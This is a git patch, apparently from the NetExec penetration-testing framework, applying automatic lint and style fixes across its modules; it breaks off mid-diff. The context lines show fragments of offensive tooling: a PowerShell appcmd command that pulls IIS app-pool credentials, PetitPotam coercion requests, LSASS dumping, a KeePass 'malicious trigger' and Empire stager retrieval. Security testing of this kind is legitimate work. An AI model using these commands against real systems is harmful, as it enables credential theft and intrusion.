From 85335213da9d271cef4ae3c7d56fd845cad7e8f9 Mon Sep 17 00:00:00 2001 From: Marshall Hallenbeck Date: Wed, 20 Sep 2023 11:59:16 -0400 Subject: [PATCH] automatic ruff fixing --- nxc/connection.py | 2 +- nxc/helpers/bloodhound.py | 9 +++++---- nxc/modules/adcs.py | 10 +++++----- nxc/modules/add_computer.py | 8 ++++---- nxc/modules/appcmd.py | 4 ++-- nxc/modules/daclread.py | 16 ++++++++-------- nxc/modules/dfscoerce.py | 2 +- nxc/modules/empire_exec.py | 4 ++-- nxc/modules/enum_av.py | 4 ++-- nxc/modules/find-computer.py | 3 +-- nxc/modules/get_netconnections.py | 4 ++-- nxc/modules/group_members.py | 6 +++--- nxc/modules/handlekatz.py | 2 +- nxc/modules/hash_spider.py | 4 ++-- nxc/modules/impersonate.py | 8 ++++---- nxc/modules/keepass_trigger.py | 4 ++-- nxc/modules/laps.py | 2 +- nxc/modules/ldap-checker.py | 12 ++++++------ nxc/modules/lsassy_dump.py | 8 ++++---- nxc/modules/msol.py | 8 ++++---- nxc/modules/mssql_priv.py | 4 ++-- nxc/modules/nanodump.py | 4 ++-- nxc/modules/nopac.py | 2 +- nxc/modules/ntlmv1.py | 4 ++-- nxc/modules/petitpotam.py | 8 ++++---- nxc/modules/pi.py | 10 +++++----- nxc/modules/procdump.py | 3 +-- nxc/modules/pso.py | 1 - nxc/modules/rdp.py | 14 +++++++------- nxc/modules/runasppl.py | 2 +- nxc/modules/scan-network.py | 3 +-- nxc/modules/scuffy.py | 4 ++-- nxc/modules/spider_plus.py | 2 +- nxc/modules/spooler.py | 8 ++++---- nxc/modules/subnets.py | 2 +- nxc/modules/veeam_dump.py | 2 +- nxc/modules/wcc.py | 6 ++---- nxc/modules/wdigest.py | 2 +- nxc/modules/web_delivery.py | 2 +- nxc/modules/whoami.py | 20 ++++++++++---------- nxc/modules/zerologon.py | 8 ++++---- nxc/netexec.py | 10 +++++----- nxc/parsers/ip.py | 2 +- nxc/protocols/ftp.py | 2 +- nxc/protocols/ldap.py | 22 +++++++--------------- nxc/protocols/ldap/database.py | 2 +- nxc/protocols/ldap/laps.py | 6 ++---- nxc/protocols/mssql.py | 19 +++++++------------ nxc/protocols/mssql/database.py | 4 ++-- nxc/protocols/mssql/mssqlexec.py | 2 +- nxc/protocols/rdp.py | 6 +++--- nxc/protocols/rdp/database.py | 2 +- nxc/protocols/smb.py | 14 +++++++------- nxc/protocols/smb/atexec.py | 4 ++-- nxc/protocols/smb/database.py | 16 ++++++++-------- nxc/protocols/smb/mmcexec.py | 2 +- nxc/protocols/smb/passpol.py | 2 +- nxc/protocols/smb/samrfunc.py | 6 +++--- nxc/protocols/smb/samruser.py | 2 +- nxc/protocols/smb/smbspider.py | 3 +-- nxc/protocols/smb/wmiexec.py | 3 +-- nxc/protocols/ssh.py | 12 ++++++------ nxc/protocols/vnc/database.py | 2 +- nxc/protocols/winrm.py | 7 +++---- nxc/protocols/winrm/database.py | 2 +- nxc/protocols/wmi.py | 9 ++++----- nxc/protocols/wmi/database.py | 2 +- nxc/protocols/wmi/proto_args.py | 3 +-- nxc/protocols/wmi/wmiexec.py | 6 +++--- nxc/protocols/wmi/wmiexec_event.py | 6 +++--- tests/e2e_test.py | 4 ++-- 71 files changed, 194 insertions(+), 219 deletions(-) diff --git a/nxc/connection.py b/nxc/connection.py index e6a1dad5..a8f5862f 100755 --- a/nxc/connection.py +++ b/nxc/connection.py @@ -154,7 +154,7 @@ class connection(object): return def proto_flow(self): - self.logger.debug(f"Kicking off proto_flow") + self.logger.debug("Kicking off proto_flow") self.proto_logger() if self.create_conn_obj(): self.enum_host_info() diff --git a/nxc/helpers/bloodhound.py b/nxc/helpers/bloodhound.py index ac4e2378..3a52c922 100644 --- a/nxc/helpers/bloodhound.py +++ b/nxc/helpers/bloodhound.py @@ -11,7 +11,8 @@ def add_user_bh(user, domain, logger, config): if config.get("BloodHound", "bh_enabled") != "False": try: from neo4j.v1 import GraphDatabase - except: + except Exception as e: + logger.debug(f"Exception while importing neo4j.v1: {e}") from neo4j import GraphDatabase from neo4j.exceptions import AuthError, ServiceUnavailable @@ -42,13 +43,13 @@ def add_user_bh(user, domain, logger, config): logger.debug(f'MATCH (c:{account_type} {{name:"{user_owned}"}}) SET c.owned=True RETURN c.name AS name') result = tx.run(f'MATCH (c:{account_type} {{name:"{user_owned}"}}) SET c.owned=True RETURN c.name AS name') logger.highlight(f"Node {user_owned} successfully set as owned in BloodHound") - except AuthError as e: + except AuthError: logger.fail(f"Provided Neo4J credentials ({config.get('BloodHound', 'bh_user')}:{config.get('BloodHound', 'bh_pass')}) are not valid.") return - except ServiceUnavailable as e: + except ServiceUnavailable: logger.fail(f"Neo4J does not seem to be available on {uri}.") return - except Exception as e: + except Exception: logger.fail("Unexpected error with Neo4J") logger.fail("Account not found on the domain") return diff --git a/nxc/modules/adcs.py b/nxc/modules/adcs.py index b921c62d..6b5aec78 100644 --- a/nxc/modules/adcs.py +++ b/nxc/modules/adcs.py @@ -47,16 +47,16 @@ class NXCModule: search_filter = "(objectClass=pKIEnrollmentService)" else: search_filter = f"(distinguishedName=CN={self.server},CN=Enrollment Services,CN=Public Key Services,CN=Services,CN=Configuration," - self.context.log.highlight("Using PKI CN: {}".format(self.server)) + self.context.log.highlight(f"Using PKI CN: {self.server}") - context.log.display("Starting LDAP search with search filter '{}'".format(search_filter)) + context.log.display(f"Starting LDAP search with search filter '{search_filter}'") try: sc = ldap.SimplePagedResultsControl() base_dn_root = connection.ldapConnection._baseDN if self.base_dn is None else self.base_dn if self.server is None: - resp = connection.ldapConnection.search( + connection.ldapConnection.search( searchFilter=search_filter, attributes=[], sizeLimit=0, @@ -65,7 +65,7 @@ class NXCModule: searchBase="CN=Configuration," + base_dn_root, ) else: - resp = connection.ldapConnection.search( + connection.ldapConnection.search( searchFilter=search_filter + base_dn_root + ")", attributes=["certificateTemplates"], sizeLimit=0, @@ -74,7 +74,7 @@ class NXCModule: searchBase="CN=Configuration," + base_dn_root, ) except LDAPSearchError as e: - context.log.fail("Obtained unexpected exception: {}".format(str(e))) + context.log.fail(f"Obtained unexpected exception: {e}") def process_servers(self, item): """ diff --git a/nxc/modules/add_computer.py b/nxc/modules/add_computer.py index c1e3b1db..312e90db 100644 --- a/nxc/modules/add_computer.py +++ b/nxc/modules/add_computer.py @@ -246,7 +246,7 @@ class NXCModule: 'Successfully added the machine account "' + self.__computerName + '" with Password: "' + self.__computerPassword + '"')) self.noLDAPRequired = True - except Exception as e: + except Exception: if logging.getLogger().level == logging.DEBUG: import traceback traceback.print_exc() @@ -283,9 +283,9 @@ class NXCModule: result = c.delete("cn=" + self.__computerName + ",cn=Computers,dc=" + ldap_domain) if result: context.log.highlight(u'{}'.format('Successfully deleted the "' + self.__computerName + '" Computer account')) - elif result == False and c.last_error == "noSuchObject": + elif result is False and c.last_error == "noSuchObject": context.log.highlight(u'{}'.format('Computer named "' + self.__computerName + '" was not found')) - elif result == False and c.last_error == "insufficientAccessRights": + elif result is False and c.last_error == "insufficientAccessRights": context.log.highlight( u'{}'.format('Insufficient Access Rights to delete the Computer "' + self.__computerName + '"')) else: @@ -299,7 +299,7 @@ class NXCModule: context.log.highlight(u'{}'.format('You can try to verify this with the nxc command:')) context.log.highlight(u'{}'.format( 'nxc ldap ' + connection.host + ' -u ' + connection.username + ' -p ' + connection.password + ' -M group-mem -o GROUP="Domain Computers"')) - elif result == False and c.last_error == "entryAlreadyExists": + elif result is False and c.last_error == "entryAlreadyExists": context.log.highlight(u'{}'.format('The Computer account "' + self.__computerName + '" already exists')) elif not result: context.log.highlight(u'{}'.format( diff --git a/nxc/modules/appcmd.py b/nxc/modules/appcmd.py index 7cf52d99..cdd1d881 100644 --- a/nxc/modules/appcmd.py +++ b/nxc/modules/appcmd.py @@ -43,8 +43,8 @@ class NXCModule: return def execute_appcmd(self, context, connection): - command = f'powershell -c "C:\\windows\\system32\\inetsrv\\appcmd.exe list apppool /@t:*"' - context.log.info(f'Checking For Hidden Credentials With Appcmd.exe') + command = 'powershell -c "C:\\windows\\system32\\inetsrv\\appcmd.exe list apppool /@t:*"' + context.log.info('Checking For Hidden Credentials With Appcmd.exe') output = connection.execute(command, True) lines = output.splitlines() diff --git a/nxc/modules/daclread.py b/nxc/modules/daclread.py index 095ce554..3c43461a 100644 --- a/nxc/modules/daclread.py +++ b/nxc/modules/daclread.py @@ -227,7 +227,7 @@ class NXCModule: try: self.target_file = open(module_options["TARGET"], "r") self.target_sAMAccountName = None - except Exception as e: + except Exception: context.log.fail("The file doesn't exist or cannot be openned.") else: self.target_sAMAccountName = module_options["TARGET"] @@ -288,7 +288,7 @@ class NXCModule: ][0] ) context.log.highlight("Found principal SID to filter on: %s" % self.principal_sid) - except Exception as e: + except Exception: context.log.fail("Principal SID not found in LDAP (%s)" % _lookedup_principal) exit(1) @@ -303,7 +303,7 @@ class NXCModule: self.principal_raw_security_descriptor = str(self.target_principal[1][0][1][0]).encode("latin-1") self.principal_security_descriptor = ldaptypes.SR_SECURITY_DESCRIPTOR(data=self.principal_raw_security_descriptor) context.log.highlight("Target principal found in LDAP (%s)" % self.target_principal[0]) - except Exception as e: + except Exception: context.log.fail("Target SID not found in LDAP (%s)" % self.target_sAMAccountName) exit(1) @@ -325,7 +325,7 @@ class NXCModule: self.principal_raw_security_descriptor = str(self.target_principal[1][0][1][0]).encode("latin-1") self.principal_security_descriptor = ldaptypes.SR_SECURITY_DESCRIPTOR(data=self.principal_raw_security_descriptor) context.log.highlight("Target principal found in LDAP (%s)" % self.target_sAMAccountName) - except Exception as e: + except Exception: context.log.fail("Target SID not found in LDAP (%s)" % self.target_sAMAccountName) continue @@ -380,7 +380,7 @@ class NXCModule: ) try: self.target_principal = target[0] - except Exception as e: + except Exception: context.log.fail("Principal not found in LDAP (%s), probably an LDAP session issue." % _lookedup_principal) exit(0) @@ -397,7 +397,7 @@ class NXCModule: dn = self.ldap_session.entries[0].entry_dn sid = format_sid(self.ldap_session.entries[0]["objectSid"].raw_values[0]) return dn, sid - except Exception as e: + except Exception: context.log.fail("User not found in LDAP: %s" % samname) return False @@ -410,7 +410,7 @@ class NXCModule: # Tries to resolve the SID from the LDAP domain dump else: try: - dn = self.ldap_session.search( + self.ldap_session.search( searchBase=self.baseDN, searchFilter="(objectSid=%s)" % sid, attributes=["sAMAccountName"], @@ -427,7 +427,7 @@ class NXCModule: 1 ][0] return samname - except Exception as e: + except Exception: context.log.debug("SID not found in LDAP: %s" % sid) return "" diff --git a/nxc/modules/dfscoerce.py b/nxc/modules/dfscoerce.py index bb3bcc06..b10ca335 100644 --- a/nxc/modules/dfscoerce.py +++ b/nxc/modules/dfscoerce.py @@ -147,7 +147,7 @@ class TriggerAuth: if self.args.verbose: nxc_logger.debug(request.dump()) # logger.debug(request.dump()) - resp = dce.request(request) + dce.request(request) except Exception as e: nxc_logger.debug(e) diff --git a/nxc/modules/empire_exec.py b/nxc/modules/empire_exec.py index 9919304c..c2fc8eb2 100644 --- a/nxc/modules/empire_exec.py +++ b/nxc/modules/empire_exec.py @@ -100,7 +100,7 @@ class NXCModule: verify=False, ) except ConnectionError: - context.log.fail(f"Unable to request stager from Empire's RESTful API") + context.log.fail("Unable to request stager from Empire's RESTful API") sys.exit(1) if stager_response.status_code not in [200, 201]: @@ -130,7 +130,7 @@ class NXCModule: if download_response.status_code == 200: context.log.success(f"Successfully generated launcher for listener '{module_options['LISTENER']}'") else: - context.log.fail(f"Something went wrong when retrieving stager Powershell command") + context.log.fail("Something went wrong when retrieving stager Powershell command") def on_admin_login(self, context, connection): if self.empire_launcher: diff --git a/nxc/modules/enum_av.py b/nxc/modules/enum_av.py index 0fa878b6..adc2cdf0 100644 --- a/nxc/modules/enum_av.py +++ b/nxc/modules/enum_av.py @@ -59,7 +59,7 @@ class NXCModule: if product["name"] not in results: results[product["name"]] = {"services": []} results[product["name"]]["services"].append(service) - except Exception as e: + except Exception: pass success += 1 except Exception as e: @@ -146,7 +146,7 @@ class LsaLookupNames: """ string_binding = string_binding or self.string_binding if not string_binding: - raise NotImplemented("String binding must be defined") + raise NotImplementedError("String binding must be defined") rpc_transport = transport.DCERPCTransportFactory(string_binding) diff --git a/nxc/modules/find-computer.py b/nxc/modules/find-computer.py index 74b7d4ed..c06949c5 100644 --- a/nxc/modules/find-computer.py +++ b/nxc/modules/find-computer.py @@ -1,7 +1,6 @@ #!/usr/bin/env python3 # -*- coding: utf-8 -*- import socket -import sys class NXCModule: ''' @@ -78,7 +77,7 @@ class NXCModule: IP = socket.gethostbyname(answer[0]) context.log.highlight(u'{} ({}) ({})'.format(answer[0],answer[1],IP)) context.log.debug('IP found') - except socket.gaierror as e: + except socket.gaierror: context.log.debug('Missing IP') context.log.highlight(u'{} ({}) ({})'.format(answer[0],answer[1],"No IP Found")) else: diff --git a/nxc/modules/get_netconnections.py b/nxc/modules/get_netconnections.py index e3f13cbf..4a114081 100755 --- a/nxc/modules/get_netconnections.py +++ b/nxc/modules/get_netconnections.py @@ -27,7 +27,7 @@ class NXCModule: def on_admin_login(self, context, connection): data = [] - cards = connection.wmi(f"select DNSDomainSuffixSearchOrder, IPAddress from win32_networkadapterconfiguration") + cards = connection.wmi("select DNSDomainSuffixSearchOrder, IPAddress from win32_networkadapterconfiguration") if cards: for c in cards: if c["IPAddress"].get("value"): @@ -35,6 +35,6 @@ class NXCModule: data.append(cards) - log_name = "network-connections-{}-{}.log".format(connection.host, datetime.now().strftime("%Y-%m-%d_%H%M%S")) + log_name = f"network-connections-{connection.host}-{datetime.now().strftime('%Y-%m-%d_%H%M%S')}.log" write_log(json.dumps(data), log_name) context.log.display(f"Saved raw output to ~/.nxc/logs/{log_name}") diff --git a/nxc/modules/group_members.py b/nxc/modules/group_members.py index 8f6dd2ca..15644a93 100644 --- a/nxc/modules/group_members.py +++ b/nxc/modules/group_members.py @@ -77,16 +77,16 @@ def doSearch(self,context, connection,searchFilter,attributeName): for item in resp: if isinstance(item, ldapasn1_impacket.SearchResultEntry) is not True: continue - attributeValue = ''; + attributeValue = '' try: for attribute in item['attributes']: if str(attribute['type']) == attributeName: if attributeName == "objectSid": attributeValue = bytes(attribute['vals'][0]) - return attributeValue; + return attributeValue elif attributeName == "distinguishedName": attributeValue = bytes(attribute['vals'][0]) - return attributeValue; + return attributeValue else: attributeValue = str(attribute['vals'][0]) if attributeValue is not None: diff --git a/nxc/modules/handlekatz.py b/nxc/modules/handlekatz.py index 96c7ec70..1d4c62f7 100644 --- a/nxc/modules/handlekatz.py +++ b/nxc/modules/handlekatz.py @@ -73,7 +73,7 @@ class NXCModule: p = p[0] if not p or p == "None": - context.log.fail(f"Failed to execute command to get LSASS PID") + context.log.fail("Failed to execute command to get LSASS PID") return # we get a CSV string back from `tasklist`, so we grab the PID from it pid = p.split(",")[1][1:-1] diff --git a/nxc/modules/hash_spider.py b/nxc/modules/hash_spider.py index fb78a038..960b8687 100644 --- a/nxc/modules/hash_spider.py +++ b/nxc/modules/hash_spider.py @@ -24,9 +24,9 @@ def neo4j_conn(context, connection, driver): session = driver.session() list(session.run("MATCH (g:Group) return g LIMIT 1")) context.log.display("Connection Successful!") - except AuthError as e: + except AuthError: context.log.fail("Invalid credentials") - except ServiceUnavailable as e: + except ServiceUnavailable: context.log.fail("Could not connect to neo4j database") except Exception as e: context.log.fail("Error querying domain admins") diff --git a/nxc/modules/impersonate.py b/nxc/modules/impersonate.py index dc4c3813..b9fc1487 100644 --- a/nxc/modules/impersonate.py +++ b/nxc/modules/impersonate.py @@ -60,14 +60,14 @@ class NXCModule: with open(file_to_upload, 'rb') as impersonate: try: connection.conn.putFile(self.share, f"{self.tmp_share}{self.impersonate}", impersonate.read) - context.log.success(f"Impersonate binary successfully uploaded") + context.log.success("Impersonate binary successfully uploaded") except Exception as e: context.log.fail(f"Error writing file to share {self.tmp_share}: {e}") return try: if self.cmd == "" or self.token == "": - context.log.display(f"Listing available primary tokens") + context.log.display("Listing available primary tokens") p = self.list_available_primary_tokens(context, connection) for line in p.splitlines(): token, token_integrity, token_owner = line.split(" ", 2) @@ -87,13 +87,13 @@ class NXCModule: for line in connection.execute(command, True, methods=["smbexec"]).splitlines(): context.log.highlight(line) else: - context.log.fail(f"Invalid token ID submitted") + context.log.fail("Invalid token ID submitted") except Exception as e: context.log.fail(f"Error runing command: {e}") finally: try: connection.conn.deleteFile(self.share, f"{self.tmp_share}{self.impersonate}") - context.log.success(f"Impersonate binary successfully deleted") + context.log.success("Impersonate binary successfully deleted") except Exception as e: context.log.fail(f"Error deleting Impersonate.exe on {self.share}: {e}") diff --git a/nxc/modules/keepass_trigger.py b/nxc/modules/keepass_trigger.py index 288f0edf..3cf49920 100644 --- a/nxc/modules/keepass_trigger.py +++ b/nxc/modules/keepass_trigger.py @@ -171,9 +171,9 @@ class NXCModule: # checks if the malicious trigger was effectively added to the specified KeePass configuration file if self.trigger_added(context, connection): - context.log.success(f"Malicious trigger successfully added, you can now wait for KeePass reload and poll the exported files") + context.log.success("Malicious trigger successfully added, you can now wait for KeePass reload and poll the exported files") else: - context.log.fail(f"Unknown error when adding malicious trigger to file") + context.log.fail("Unknown error when adding malicious trigger to file") sys.exit(1) def check_trigger_added(self, context, connection): diff --git a/nxc/modules/laps.py b/nxc/modules/laps.py index 6cb2580c..a8b92d0f 100644 --- a/nxc/modules/laps.py +++ b/nxc/modules/laps.py @@ -3,7 +3,7 @@ import json from impacket.ldap import ldapasn1 as ldapasn1_impacket -from nxc.protocols.ldap.laps import LDAPConnect, LAPSv2Extract +from nxc.protocols.ldap.laps import LAPSv2Extract class NXCModule: """ diff --git a/nxc/modules/ldap-checker.py b/nxc/modules/ldap-checker.py index cbdbecbf..b77bb248 100644 --- a/nxc/modules/ldap-checker.py +++ b/nxc/modules/ldap-checker.py @@ -162,24 +162,24 @@ class NXCModule: target = MSLDAPTarget(connection.host, hostname=connection.hostname, domain=connection.domain, dc_ip=connection.domain) ldapIsProtected = asyncio.run(run_ldap(target, credential)) - if ldapIsProtected == False: + if ldapIsProtected is False: context.log.highlight("LDAP Signing NOT Enforced!") - elif ldapIsProtected == True: + elif ldapIsProtected is True: context.log.fail("LDAP Signing IS Enforced") else: context.log.fail("Connection fail, exiting now") exit() - if DoesLdapsCompleteHandshake(connection.host) == True: + if DoesLdapsCompleteHandshake(connection.host) is True: target = MSLDAPTarget(connection.host, 636, UniProto.CLIENT_SSL_TCP, hostname=connection.hostname, domain=connection.domain, dc_ip=connection.domain) ldapsChannelBindingAlwaysCheck = asyncio.run(run_ldaps_noEPA(target, credential)) target = MSLDAPTarget(connection.host, hostname=connection.hostname, domain=connection.domain, dc_ip=connection.domain) ldapsChannelBindingWhenSupportedCheck = asyncio.run(run_ldaps_withEPA(target, credential)) - if ldapsChannelBindingAlwaysCheck == False and ldapsChannelBindingWhenSupportedCheck == True: + if ldapsChannelBindingAlwaysCheck is False and ldapsChannelBindingWhenSupportedCheck is True: context.log.highlight('LDAPS Channel Binding is set to "When Supported"') - elif ldapsChannelBindingAlwaysCheck == False and ldapsChannelBindingWhenSupportedCheck == False: + elif ldapsChannelBindingAlwaysCheck is False and ldapsChannelBindingWhenSupportedCheck is False: context.log.highlight('LDAPS Channel Binding is set to "NEVER"') - elif ldapsChannelBindingAlwaysCheck == True: + elif ldapsChannelBindingAlwaysCheck is True: context.log.fail('LDAPS Channel Binding is set to "Required"') else: context.log.fail("\nSomething went wrong...") diff --git a/nxc/modules/lsassy_dump.py b/nxc/modules/lsassy_dump.py index 5f2610c5..c34b02db 100644 --- a/nxc/modules/lsassy_dump.py +++ b/nxc/modules/lsassy_dump.py @@ -75,13 +75,13 @@ class NXCModule: credentials, tickets, masterkeys = parsed file.close() - context.log.debug(f"Closed dumper file") + context.log.debug("Closed dumper file") file_path = file.get_file_path() context.log.debug(f"File path: {file_path}") try: deleted_file = ImpacketFile.delete(session, file_path) if deleted_file: - context.log.debug(f"Deleted dumper file") + context.log.debug("Deleted dumper file") else: context.log.fail(f"[OPSEC] No exception, but failed to delete file: {file_path}") except Exception as e: @@ -119,7 +119,7 @@ class NXCModule: ) credentials_output.append(cred) - context.log.debug(f"Calling process_credentials") + context.log.debug("Calling process_credentials") self.process_credentials(context, connection, credentials_output) def process_credentials(self, context, connection, credentials): @@ -128,7 +128,7 @@ class NXCModule: credz_bh = [] domain = None for cred in credentials: - if cred["domain"] == None: + if cred["domain"] is None: cred["domain"] = "" domain = cred["domain"] if "." not in cred["domain"] and cred["domain"].upper() in connection.domain.upper(): diff --git a/nxc/modules/msol.py b/nxc/modules/msol.py index 7791fd78..9132006b 100644 --- a/nxc/modules/msol.py +++ b/nxc/modules/msol.py @@ -64,25 +64,25 @@ class NXCModule: with open(file_to_upload, "rb") as msol: try: connection.conn.putFile(self.share, f"{self.tmp_share}{self.msol}", msol.read) - context.log.success(f"Msol script successfully uploaded") + context.log.success("Msol script successfully uploaded") except Exception as e: context.log.fail(f"Error writing file to share {self.tmp_share}: {e}") return try: if self.cmd == "": - context.log.display(f"Executing the script") + context.log.display("Executing the script") p = self.exec_script(context, connection) for line in p.splitlines(): p1, p2 = line.split(" ", 1) context.log.highlight(f"{p1} {p2}") else: - context.log.fail(f"Script Execution Impossible") + context.log.fail("Script Execution Impossible") except Exception as e: context.log.fail(f"Error running command: {e}") finally: try: connection.conn.deleteFile(self.share, f"{self.tmp_share}{self.msol}") - context.log.success(f"Msol script successfully deleted") + context.log.success("Msol script successfully deleted") except Exception as e: context.log.fail(f"[OPSEC] Error deleting msol script on {self.share}: {e}") diff --git a/nxc/modules/mssql_priv.py b/nxc/modules/mssql_priv.py index 390ec1dd..946943a8 100644 --- a/nxc/modules/mssql_priv.py +++ b/nxc/modules/mssql_priv.py @@ -175,7 +175,7 @@ class NXCModule: is_admin = res[0][""] self.context.log.debug(f"IsAdmin Result: {is_admin}") if is_admin: - self.context.log.debug(f"User is admin!") + self.context.log.debug("User is admin!") self.admin_privs = True return True else: @@ -276,7 +276,7 @@ class NXCModule: return users def remove_sysadmin_priv(self) -> bool: - res = self.query_and_get_output(f"EXEC sp_dropsrvrolemember '{self.current_username}', 'sysadmin'") + self.query_and_get_output(f"EXEC sp_dropsrvrolemember '{self.current_username}', 'sysadmin'") return not self.is_admin() def is_admin_user(self, username) -> bool: diff --git a/nxc/modules/nanodump.py b/nxc/modules/nanodump.py index 4b3d7461..a22f55d8 100644 --- a/nxc/modules/nanodump.py +++ b/nxc/modules/nanodump.py @@ -124,7 +124,7 @@ class NXCModule: p = p[0] if not p or p == "None": - self.context.log.fail(f"Failed to execute command to get LSASS PID") + self.context.log.fail("Failed to execute command to get LSASS PID") return pid = p.split(",")[1][1:-1] @@ -138,7 +138,7 @@ class NXCModule: self.context.log.debug(f"NanoDump Command Result: {p}") if not p or p == "None": - self.context.log.fail(f"Failed to execute command to execute NanoDump") + self.context.log.fail("Failed to execute command to execute NanoDump") self.delete_nanodump_binary() return diff --git a/nxc/modules/nopac.py b/nxc/modules/nopac.py index 8c53f31c..e5ae5f86 100644 --- a/nxc/modules/nopac.py +++ b/nxc/modules/nopac.py @@ -49,5 +49,5 @@ class NXCModule: context.log.highlight("") context.log.highlight("VULNERABLE") context.log.highlight("Next step: https://github.com/Ridter/noPac") - except OSError as e: + except OSError: context.log.debug(f"Error connecting to Kerberos (port 88) on {connection.host}") diff --git a/nxc/modules/ntlmv1.py b/nxc/modules/ntlmv1.py index b3afa241..a0fc8551 100644 --- a/nxc/modules/ntlmv1.py +++ b/nxc/modules/ntlmv1.py @@ -43,8 +43,8 @@ class NXCModule: key_handle, "lmcompatibilitylevel\x00", ) - except rrp.DCERPCSessionError as e: - context.log.debug(f"Unable to reference lmcompatabilitylevel, which probably means ntlmv1 is not set") + except rrp.DCERPCSessionError: + context.log.debug("Unable to reference lmcompatabilitylevel, which probably means ntlmv1 is not set") if rtype and data and int(data) in [0, 1, 2]: context.log.highlight(self.output.format(connection.conn.getRemoteHost(), data)) diff --git a/nxc/modules/petitpotam.py b/nxc/modules/petitpotam.py index 4d4ceb52..52abcbb8 100644 --- a/nxc/modules/petitpotam.py +++ b/nxc/modules/petitpotam.py @@ -67,8 +67,8 @@ class NXCModule: host.signing, petitpotam=True, ) - except Exception as e: - context.log.debug(f"Error updating petitpotam status in database") + except Exception: + context.log.debug("Error updating petitpotam status in database") class DCERPCSessionError(DCERPCException): @@ -270,7 +270,7 @@ def efs_rpc_open_file_raw(dce, listener, context=None): request = EfsRpcOpenFileRaw() request["fileName"] = "\\\\%s\\test\\Settings.ini\x00" % listener request["Flag"] = 0 - resp = dce.request(request) + dce.request(request) except Exception as e: if str(e).find("ERROR_BAD_NETPATH") >= 0: @@ -284,7 +284,7 @@ def efs_rpc_open_file_raw(dce, listener, context=None): try: request = EfsRpcEncryptFileSrv() request["FileName"] = "\\\\%s\\test\\Settings.ini\x00" % listener - resp = dce.request(request) + dce.request(request) except Exception as e: if str(e).find("ERROR_BAD_NETPATH") >= 0: context.log.info("[+] Got expected ERROR_BAD_NETPATH exception!!") diff --git a/nxc/modules/pi.py b/nxc/modules/pi.py index 2fc74151..0fd80f7c 100644 --- a/nxc/modules/pi.py +++ b/nxc/modules/pi.py @@ -48,8 +48,8 @@ class NXCModule: try: if self.cmd == "" or self.pid == "": self.uploadfile = False - context.log.highlight(f"Firstly run tasklist.exe /v to find process id for each user") - context.log.highlight(f"Usage: -o PID=pid EXEC='Command'") + context.log.highlight("Firstly run tasklist.exe /v to find process id for each user") + context.log.highlight("Usage: -o PID=pid EXEC='Command'") return else: self.uploadfile = True @@ -57,7 +57,7 @@ class NXCModule: with open(file_to_upload, 'rb') as pi: try: connection.conn.putFile(self.share, f"{self.tmp_share}{self.pi}", pi.read) - context.log.success(f"pi.exe successfully uploaded") + context.log.success("pi.exe successfully uploaded") except Exception as e: context.log.fail(f"Error writing file to share {self.tmp_share}: {e}") @@ -72,8 +72,8 @@ class NXCModule: context.log.fail(f"Error running command: {e}") finally: try: - if self.uploadfile == True: + if self.uploadfile is True: connection.conn.deleteFile(self.share, f"{self.tmp_share}{self.pi}") - context.log.success(f"pi.exe successfully deleted") + context.log.success("pi.exe successfully deleted") except Exception as e: context.log.fail(f"Error deleting pi.exe on {self.share}: {e}") diff --git a/nxc/modules/procdump.py b/nxc/modules/procdump.py index 6ee14fdb..2b8e77f6 100644 --- a/nxc/modules/procdump.py +++ b/nxc/modules/procdump.py @@ -53,7 +53,7 @@ class NXCModule: self.dir_result = module_options["DIR_RESULT"] def on_admin_login(self, context, connection): - if self.useembeded == True: + if self.useembeded is True: with open(self.procdump_path + self.procdump, "wb") as procdump: procdump.write(self.procdump_embeded) @@ -114,7 +114,6 @@ class NXCModule: with open(self.dir_result + machine_name, "rb") as dump: try: - credentials = [] credz_bh = [] try: pypy_parse = pypykatz.parse_minidump_external(dump) diff --git a/nxc/modules/pso.py b/nxc/modules/pso.py index c34e412f..e5955589 100644 --- a/nxc/modules/pso.py +++ b/nxc/modules/pso.py @@ -4,7 +4,6 @@ from impacket.ldap import ldapasn1 as ldapasn1_impacket from impacket.ldap import ldap as ldap_impacket from math import fabs -import re class NXCModule: diff --git a/nxc/modules/rdp.py b/nxc/modules/rdp.py index ccfb5d4b..60bb6b3e 100644 --- a/nxc/modules/rdp.py +++ b/nxc/modules/rdp.py @@ -35,7 +35,7 @@ class NXCModule: nxc smb 192.168.1.1 -u {user} -p {password} -M rdp -o METHOD=smb ACTION={enable, disable, enable-ram, disable-ram} nxc smb 192.168.1.1 -u {user} -p {password} -M rdp -o METHOD=wmi ACTION={enable, disable, enable-ram, disable-ram} {OLD=true} {DCOM-TIMEOUT=5} """ - if not "ACTION" in module_options: + if "ACTION" not in module_options: context.log.fail("ACTION option not specified!") exit(1) @@ -45,7 +45,7 @@ class NXCModule: self.action = module_options["ACTION"].lower() - if not "METHOD" in module_options: + if "METHOD" not in module_options: self.method = "wmi" else: self.method = module_options['METHOD'].lower() @@ -54,7 +54,7 @@ class NXCModule: context.log.fail(f"Protocol: {context.protocol} not support this method") exit(1) - if not "DCOM-TIMEOUT" in module_options: + if "DCOM-TIMEOUT" not in module_options: self.dcom_timeout = 10 else: try: @@ -63,7 +63,7 @@ class NXCModule: context.log.fail("Wrong DCOM timeout value!") exit(1) - if not "OLD" in module_options: + if "OLD" not in module_options: self.oldSystem = False else: self.oldSystem = True @@ -260,7 +260,7 @@ class rdp_WMI: self.__dcom.disconnect() def rdp_Wrapper(self, action, old=False): - if old == False: + if old is False: # According to this document: https://learn.microsoft.com/en-us/windows/win32/termserv/win32-tslogonsetting # Authentication level must set to RPC_C_AUTHN_LEVEL_PKT_PRIVACY when accessing namespace "//./root/cimv2/TerminalServices" iWbemServices = self.__iWbemLevel1Login.NTLMLogin('//./root/cimv2/TerminalServices', NULL, NULL) @@ -293,7 +293,7 @@ class rdp_WMI: # Need to create new iWbemServices interface in order to flush results def query_RDPResult(self, old=False): - if old == False: + if old is False: iWbemServices = self.__iWbemLevel1Login.NTLMLogin('//./root/cimv2/TerminalServices', NULL, NULL) iWbemServices.get_dce_rpc().set_auth_level(RPC_C_AUTHN_LEVEL_PKT_PRIVACY) self.__iWbemLevel1Login.RemRelease() @@ -338,5 +338,5 @@ class rdp_WMI: out = StdRegProv.GetDWORDValue(2147483650, 'System\\CurrentControlSet\\Control\\Lsa', 'DisableRestrictedAdmin') if out.uValue == 0: self.logger.success("Enable RDP Restricted Admin Mode via WMI(ncacn_ip_tcp) successfully") - elif out.uValue == None: + elif out.uValue is None: self.logger.success("Disable RDP Restricted Admin Mode via WMI(ncacn_ip_tcp) successfully") \ No newline at end of file diff --git a/nxc/modules/runasppl.py b/nxc/modules/runasppl.py index 